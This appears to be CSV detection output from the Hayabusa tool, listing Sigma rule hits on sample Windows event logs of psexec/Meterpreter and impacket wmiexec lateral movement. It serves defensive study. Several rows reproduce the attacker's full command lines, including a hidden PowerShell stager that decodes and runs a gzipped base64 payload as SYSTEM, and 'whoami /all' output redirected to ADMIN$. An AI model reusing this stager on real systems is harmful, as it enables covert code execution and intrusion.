Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.090 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.090 +09:00,IEWIN7,1,medium,Mimikatz Command Line,,rules/sigma/process_creation/win_mimikatz_command_line.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,FromBase64String Command Line,,rules/sigma/process_creation/win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.090 +09:00,IEWIN7,1,medium,Curl Start Combination,,rules/sigma/process_creation/win_susp_curl_start_combo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.090 +09:00,IEWIN7,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.106 +09:00,IEWIN7,1,informational,Process Creation,"Command: powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.106 +09:00,IEWIN7,1,medium,Mimikatz Command Line,,rules/sigma/process_creation/win_mimikatz_command_line.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,FromBase64String Command Line,,rules/sigma/process_creation/win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.106 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,Suspicious PowerShell Command Line,,rules/sigma/process_creation/win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.106 +09:00,IEWIN7,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.356 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""powershell.exe"" -noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA=='))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: NT AUTHORITY\SYSTEM : Parent Command: powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.356 +09:00,IEWIN7,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.356 +09:00,IEWIN7,1,high,FromBase64String Command Line,,rules/sigma/process_creation/win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.356 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.356 +09:00,IEWIN7,1,high,Suspicious PowerShell Command Line,,rules/sigma/process_creation/win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.356 +09:00,IEWIN7,1,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.356 +09:00,IEWIN7,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.371 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:54.152 +09:00,IEWIN7,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:32:51.168 +09:00,IEWIN7,1,informational,Process Creation,Command: cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx -2019-05-01 05:32:51.168 +09:00,IEWIN7,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx -2019-05-01 05:32:51.246 +09:00,IEWIN7,1,informational,Process Creation,Command: cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx -2019-05-01 05:32:51.246 +09:00,IEWIN7,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx -2019-05-01 05:32:51.324 +09:00,IEWIN7,1,informational,Process Creation,Command: cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx -2019-05-01 05:32:51.324 +09:00,IEWIN7,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx -2019-05-01 05:32:51.324 